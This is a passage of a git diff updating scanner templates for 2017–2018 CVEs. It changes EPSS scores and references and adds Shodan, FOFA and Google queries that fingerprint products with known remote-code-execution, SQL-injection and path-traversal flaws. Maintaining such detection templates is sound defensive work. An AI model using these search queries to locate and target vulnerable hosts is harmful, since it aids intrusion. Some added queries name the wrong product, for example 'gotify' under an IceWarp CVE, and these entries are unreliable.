shodan-query: http.html:/wp-content/plugins/user-role/ + fofa-query: body=/wp-content/plugins/user-role/ tags: cve,cve2017,wordpress,wp-plugin,xss,bws-user-role,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index b7393b1790..65c8cabca4 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-18598 cwe-id: CWE-79 epss-score: 0.00094 - epss-percentile: 0.38554 + epss-percentile: 0.39752 cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: qards framework: wordpress tags: cve2017,cve,wp-plugin,oast,wpscan,wordpress,ssrf,xss,designmodo - flow: http(1) && http(2) http: diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index f79e1ee9db..4c6c339c2d 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2017-18638 cwe-id: CWE-918 - epss-score: 0.00902 - epss-percentile: 0.80938 + epss-score: 0.00827 + epss-percentile: 0.81931 cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 4b4be69409..586de89eea 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: oracle product: weblogic_server + shodan-query: http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" tags: cve,cve2017,rce,oast,hackerone,weblogic,oracle http: diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index 34e1582b67..088fe2c837 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-3528 cwe-id: CWE-601 epss-score: 0.00865 - epss-percentile: 0.81972 + epss-percentile: 0.82307 cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index a39445b71a..7b4e5e57d0 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-4011 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49103 + epss-percentile: 0.49977 cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 8f0b35c820..25f3f5218d 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2017-5631 cwe-id: CWE-79 epss-score: 0.00286 - epss-percentile: 0.65504 + epss-percentile: 0.68687 cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: kmc_information_systems product: caseaware + fofa-query: title="caseaware" tags: cve2017,cve,edb,xss,caseaware,kmc_information_systems http: diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index 4a75dec841..985a6a668c 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -21,7 +21,7 @@ info: cvss-score: 10 cve-id: CVE-2017-5638 cwe-id: CWE-20 - epss-score: 0.97543 + epss-score: 0.97542 epss-percentile: 0.99995 cpe: cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:* metadata: @@ -30,6 +30,8 @@ info: vendor: apache product: struts shodan-query: html:"Apache Struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve2017,cve,apache,kev,msf,struts,rce http: diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index 31c5b32685..b61c01b8ad 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -29,6 +29,8 @@ info: vendor: intel product: active_management_technology_firmware shodan-query: title:"Active Management Technology" + fofa-query: title="active management technology" + google-query: intitle:"active management technology" tags: cve2017,cve,amt,intel,tenable,kev http: diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index b4bdcfd7eb..bc2a7ea770 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -26,8 +26,9 @@ info: vendor: phpcollab product: phpcollab shodan-query: http.title:"PhpCollab" + fofa-query: title="phpcollab" + google-query: intitle:"phpcollab" tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive - variables: string: "CVE-2017-6090" diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index 9514f14b50..875939fb07 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -28,6 +28,7 @@ info: max-request: 1 vendor: microsoft product: internet_information_server + shodan-query: cpe:"cpe:2.3:a:microsoft:internet_information_server" tags: cve2017,cve,rce,windows,iis,kev,microsoft http: diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index ed275c5a6d..823b523c7e 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2017-7391 cwe-id: CWE-79 epss-score: 0.00195 - epss-percentile: 0.56428 + epss-percentile: 0.56964 cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:* metadata: max-request: 1 vendor: magmi_project product: magmi + shodan-query: http.component:"magento" tags: cve2017,cve,magmi,xss,magmi_project http: diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index dce109934a..23e75da196 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -26,12 +26,14 @@ info: cve-id: CVE-2017-7615 cwe-id: CWE-640 epss-score: 0.97404 - epss-percentile: 0.99917 + epss-percentile: 0.99923 cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* metadata: max-request: 5 vendor: mantisbt product: mantisbt + shodan-query: http.favicon.hash:662709064 + fofa-query: icon_hash=662709064 tags: cve,cve2017,mantisbt,unauth,edb http: diff --git a/http/cves/2017/CVE-2017-7855.yaml b/http/cves/2017/CVE-2017-7855.yaml index 73a298378d..1eb505345d 100644 --- a/http/cves/2017/CVE-2017-7855.yaml +++ b/http/cves/2017/CVE-2017-7855.yaml @@ -24,6 +24,8 @@ info: vendor: icewarp product: server shodan-query: title:"icewarp" + fofa-query: title="gotify" + google-query: intitle:"gotify" tags: cve,cve2017,xss,icewarp http: diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index cc1ad0e3e8..607cd654fd 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-7921 cwe-id: CWE-287 epss-score: 0.01361 - epss-percentile: 0.85934 + epss-percentile: 0.86195 cpe: cpe:2.3:o:hikvision:ds-2cd2032-i_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml index 4e91d62001..14972a640b 100644 --- a/http/cves/2017/CVE-2017-7925.yaml +++ b/http/cves/2017/CVE-2017-7925.yaml @@ -27,6 +27,7 @@ info: vendor: dahuasecurity product: dh-ipc-hdbw23a0rn-zs_firmware shodan-query: http.favicon.hash:2019488876 + fofa-query: icon_hash=2019488876 tags: cve,cve2017,dahua,camera,dahuasecurity http: diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index 036670e1de..81fc123f6c 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-8917 cwe-id: CWE-89 epss-score: 0.97555 - epss-percentile: 0.99997 + epss-percentile: 0.99998 cpe: cpe:2.3:a:joomla:joomla\!:3.7.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: joomla product: joomla\! shodan-query: http.component:"Joomla" + fofa-query: body="joomla! - open source content management" tags: cve2017,cve,joomla,sqli variables: num: "999999999" diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index de79ed77ef..de35bb88ae 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-9140 cwe-id: CWE-79 epss-score: 0.00191 - epss-percentile: 0.55758 + epss-percentile: 0.56488 cpe: cpe:2.3:a:progress:telerik_reporting:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index f2bc24d415..892a6db7fc 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -18,14 +18,17 @@ info: cvss-score: 6.5 cve-id: CVE-2017-9416 cwe-id: CWE-22 - epss-score: 0.01037 - epss-percentile: 0.83585 + epss-score: 0.01187 + epss-percentile: 0.85048 cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: odoo product: odoo + shodan-query: cpe:"cpe:2.3:a:odoo:odoo" + fofa-query: title="odoo" + google-query: intitle:"odoo" tags: cve2017,cve,odoo,lfi http: diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 69bed2f75e..51f30bafe7 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -14,13 +14,14 @@ info: - https://ecosystem.atlassian.net/browse/OAUTH-344 - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3 - https://nvd.nist.gov/vuln/detail/CVE-2017-9506 + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-9506 cwe-id: CWE-918 epss-score: 0.00575 - epss-percentile: 0.75564 + epss-percentile: 0.77897 cpe: cpe:2.3:a:atlassian:oauth:1.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index 488403b049..32d5c459cc 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml @@ -31,6 +31,7 @@ info: product: struts shodan-query: title:"Struts2 Showcase" fofa-query: title="Struts2 Showcase" + google-query: intitle:"struts2 showcase" tags: cve2017,cve,apache,rce,struts,kev variables: num1: "{{rand_int(40000, 44800)}}" diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml index 8b453e5610..79c018c149 100644 --- a/http/cves/2017/CVE-2017-9805.yaml +++ b/http/cves/2017/CVE-2017-9805.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2017-9805 cwe-id: CWE-502 epss-score: 0.97541 - epss-percentile: 0.99995 + epss-percentile: 0.99994 cpe: cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve,cve2017,apache,rce,struts,kev http: diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index 97e44144e5..36f50d8c22 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -20,13 +20,14 @@ info: cvss-score: 8.8 cve-id: CVE-2017-9822 cwe-id: CWE-20 - epss-score: 0.97056 - epss-percentile: 0.99742 + epss-score: 0.96984 + epss-percentile: 0.99734 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dnnsoftware product: dotnetnuke + fofa-query: app="dotnetnuke" tags: cve2017,cve,packetstorm,dotnetnuke,bypass,rce,deserialization,kev,dnnsoftware http: diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index fcdf436a30..8673537ca0 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-9833 cwe-id: CWE-22 epss-score: 0.7354 - epss-percentile: 0.98027 + epss-percentile: 0.98104 cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index 3cd87f31de..aa8a60026f 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -14,13 +14,14 @@ info: - http://web.archive.org/web/20211207054802/https://securitytracker.com/id/1040345 - https://nvd.nist.gov/vuln/detail/CVE-2018-0127 - http://www.securitytracker.com/id/1040345 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-0127 cwe-id: CWE-306,CWE-200 epss-score: 0.09982 - epss-percentile: 0.94323 + epss-percentile: 0.94853 cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index c7ad561227..9eb219e168 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-1000129 cwe-id: CWE-79 epss-score: 0.00257 - epss-percentile: 0.64818 + epss-percentile: 0.65435 cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index 6322e6368f..ae606c2ab8 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -14,13 +14,15 @@ info: - https://jolokia.org/#Security_fixes_with_1.5.0 - https://access.redhat.com/errata/RHSA-2018:2669 - https://nvd.nist.gov/vuln/detail/CVE-2018-1000130 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/SexyBeast233/SecBooks classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2018-1000130 cwe-id: CWE-74 epss-score: 0.89191 - epss-percentile: 0.98492 + epss-percentile: 0.9873 cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index 5eb5e5ebfa..9467c33124 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -24,6 +24,9 @@ info: max-request: 1 vendor: cobblerd product: cobbler + shodan-query: http.title:"cobbler web interface" + fofa-query: title="cobbler web interface" + google-query: intitle:"cobbler web interface" tags: cve2018,cve,cobbler,auth-bypass,cobblerd http: diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml index d240447832..6295efc437 100644 --- a/http/cves/2018/CVE-2018-1000533.yaml +++ b/http/cves/2018/CVE-2018-1000533.yaml @@ -27,6 +27,7 @@ info: max-request: 2 vendor: gitlist product: gitlist + shodan-query: cpe:"cpe:2.3:a:gitlist:gitlist" tags: cve,cve2018,git,gitlist,vulhub,rce http: diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index 009d5c0c00..c310e25cba 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -29,6 +29,7 @@ info: vendor: sympa product: sympa shodan-query: http.html:"sympa" + fofa-query: body="sympa" tags: cve,cve2018,redirect,sympa,debian http: diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index dcc69a343c..25fb539b3d 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -19,8 +19,8 @@ info: cvss-score: 4.8 cve-id: CVE-2018-1000856 cwe-id: CWE-79 - epss-score: 0.00092 - epss-percentile: 0.38207 + epss-score: 0.00069 + epss-percentile: 0.30035 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index cd9da547aa..0506efb3c4 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -20,13 +20,15 @@ info: cvss-score: 9.8 cve-id: CVE-2018-1000861 cwe-id: CWE-502 - epss-score: 0.9734 - epss-percentile: 0.99882 + epss-score: 0.9732 + epss-percentile: 0.99878 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 1 vendor: jenkins product: jenkins + shodan-query: http.favicon.hash:81586312 + fofa-query: icon_hash=81586312 tags: cve2018,cve,packetstorm,kev,vulhub,rce,jenkins http: diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index e170b2d02c..49e2dd760f 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -20,12 +20,14 @@ info: cve-id: CVE-2018-10141 cwe-id: CWE-79 epss-score: 0.00126 - epss-percentile: 0.46296 + epss-percentile: 0.47275 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: paloaltonetworks product: pan-os + fofa-query: icon_hash="-631559155" + shodan-query: http.favicon.hash:"-631559155" tags: cve,cve2018,panos,vpn,globalprotect,xss,paloaltonetworks http: diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index feadcb357a..c97ede9e94 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -26,6 +26,7 @@ info: max-request: 1 vendor: zend product: zend_server + shodan-query: cpe:"cpe:2.3:a:zend:zend_server" tags: cve,cve2018,xss,zend http: diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index 5ddf231497..21be97774f 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -14,13 +14,14 @@ info: - https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py - https://nvd.nist.gov/vuln/detail/CVE-2018-10562 - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/ + - https://github.com/ethicalhackeragnidhra/GPON classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-10562 cwe-id: CWE-78 - epss-score: 0.97441 - epss-percentile: 0.99945 + epss-score: 0.97423 + epss-percentile: 0.99934 cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-10735.yaml b/http/cves/2018/CVE-2018-10735.yaml index 2d033c66f6..44a4f42524 100644 --- a/http/cves/2018/CVE-2018-10735.yaml +++ b/http/cves/2018/CVE-2018-10735.yaml @@ -23,8 +23,9 @@ info: vendor: nagios product: nagios_xi fofa-query: app="Nagios-XI" + shodan-query: http.title:"nagios xi" + google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqli - variables: num: "{{rand_int(2000000000, 2100000000)}}" diff --git a/http/cves/2018/CVE-2018-10736.yaml b/http/cves/2018/CVE-2018-10736.yaml index ac3bcd34f2..54c31f2c3a 100644 --- a/http/cves/2018/CVE-2018-10736.yaml +++ b/http/cves/2018/CVE-2018-10736.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.2 cve-id: CVE-2018-10736 cwe-id: CWE-89 - epss-score: 0.00403 - epss-percentile: 0.7323 + epss-score: 0.01861 + epss-percentile: 0.88359 cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: verified: true @@ -24,8 +24,9 @@ info: vendor: nagios product: nagios_xi fofa-query: app="Nagios-XI" + shodan-query: http.title:"nagios xi" + google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqli - variables: num: "{{rand_int(2000000000, 2100000000)}}" diff --git a/http/cves/2018/CVE-2018-10737.yaml b/http/cves/2018/CVE-2018-10737.yaml index 816ec7a586..c2fcae1645 100644 --- a/http/cves/2018/CVE-2018-10737.yaml +++ b/http/cves/2018/CVE-2018-10737.yaml @@ -23,8 +23,9 @@ info: vendor: nagios product: nagios_xi fofa-query: app="Nagios-XI" + shodan-query: http.title:"nagios xi" + google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqli - variables: num: "{{rand_int(2000000000, 2100000000)}}" diff --git a/http/cves/2018/CVE-2018-10738.yaml b/http/cves/2018/CVE-2018-10738.yaml index 9c37617a2b..13be4d6826 100644 --- a/http/cves/2018/CVE-2018-10738.yaml +++ b/http/cves/2018/CVE-2018-10738.yaml @@ -14,8 +14,8 @@ info: cvss-score: 7.2 cve-id: CVE-2018-10738 cwe-id: CWE-89 - epss-score: 0.00403 - epss-percentile: 0.7323 + epss-score: 0.01861 + epss-percentile: 0.88359 cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: verified: true @@ -23,8 +23,9 @@ info: vendor: nagios product: nagios_xi fofa-query: app="Nagios-XI" + shodan-query: http.title:"nagios xi" + google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqli - variables: num: "{{rand_int(2000000000, 2100000000)}}" diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index c4a9a91a38..33c77bad43 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2018-10823 cwe-id: CWE-78 - epss-score: 0.96737 - epss-percentile: 0.99597 + epss-score: 0.96759 + epss-percentile: 0.9967 cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10942.yaml b/http/cves/2018/CVE-2018-10942.yaml index 9e6acac4b7..8c69a4a890 100644 --- a/http/cves/2018/CVE-2018-10942.yaml +++ b/http/cves/2018/CVE-2018-10942.yaml @@ -11,11 +11,19 @@ info: - https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/ - https://nvd.nist.gov/vuln/detail/CVE-2018-10942 classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2018-10942 + cwe-id: CWE-434 + epss-score: 0.18241 + epss-percentile: 0.96178 + cpe: cpe:2.3:a:attribute_wizard_project:attribute_wizard:1.6.9:*:*:*:*:prestashop:*:* metadata: max-request: 8 + vendor: attribute_wizard_project + product: attribute_wizard + framework: prestashop tags: prestashop,attributewizardpro,intrusive,file-upload - variables: filename: '{{rand_base(7, "abc")}}' diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index a509b9736d..7b8a92335a 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -21,14 +21,16 @@ info: cvss-score: 7.5 cve-id: CVE-2018-10956 cwe-id: CWE-22 - epss-score: 0.57917 - epss-percentile: 0.97652 + epss-score: 0.54195 + epss-percentile: 0.97627 cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ipconfigure product: orchid_core_vms shodan-query: http.title:"Orchid Core VMS" + fofa-query: title="orchid core vms" + google-query: intitle:"orchid core vms" tags: cve2018,cve,orchid,vms,lfi,edb,ipconfigure http: diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index dd9501ca2f..556ee22841 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -30,6 +30,7 @@ info: vendor: monstra product: monstra_cms shodan-query: http.favicon.hash:419828698 + fofa-query: icon_hash=419828698 tags: cve,cve2018,xss,mostra,mostracms,cms,edb,monstra http: diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index 2787cb03f5..27054a7f07 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: splunk product: splunk + shodan-query: http.title:"login - splunk" + fofa-query: title="login - splunk" + google-query: intitle:"login - splunk" tags: cve,cve2018,edb,splunk http: diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index b812c09865..bffafebce3 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-11473 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.39534 + epss-score: 0.001 + epss-percentile: 0.4118 cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: monstra product: monstra shodan-query: http.favicon.hash:419828698 + fofa-query: icon_hash=419828698 tags: cve,cve2018,xss,mostra,mostracms,cms,monstra http: diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index 5deb50899a..c2e50ddc0d 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-11709 cwe-id: CWE-79 - epss-score: 0.00175 - epss-percentile: 0.53725 + epss-score: 0.00183 + epss-percentile: 0.55455 cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index 4146114bce..525db1a5fc 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -29,6 +29,8 @@ info: vendor: apache product: tomcat_jk_connector shodan-query: title:"Apache Tomcat" + fofa-query: title="apache tomcat" + google-query: intitle:"apache tomcat" tags: cve2018,cve,apache,tomcat,httpd,mod-jk http: diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 540b9f8c3d..3d29a731da 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -22,12 +22,15 @@ info: cve-id: CVE-2018-11776 cwe-id: CWE-20 epss-score: 0.97517 - epss-percentile: 0.99985 + epss-percentile: 0.99987 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve,cve2018,packetstorm,apache,rce,struts,kev http: diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index a39a136872..0a78bab8e9 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -21,14 +21,16 @@ info: cvss-score: 4.3 cve-id: CVE-2018-11784 cwe-id: CWE-601 - epss-score: 0.83718 - epss-percentile: 0.98183 + epss-score: 0.79069 + epss-percentile: 0.9827 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: tomcat shodan-query: title:"Apache Tomcat" + fofa-query: body="apache tomcat" + google-query: intitle:"apache tomcat" tags: cve,cve2018,packetstorm,tomcat,redirect,apache http: diff --git 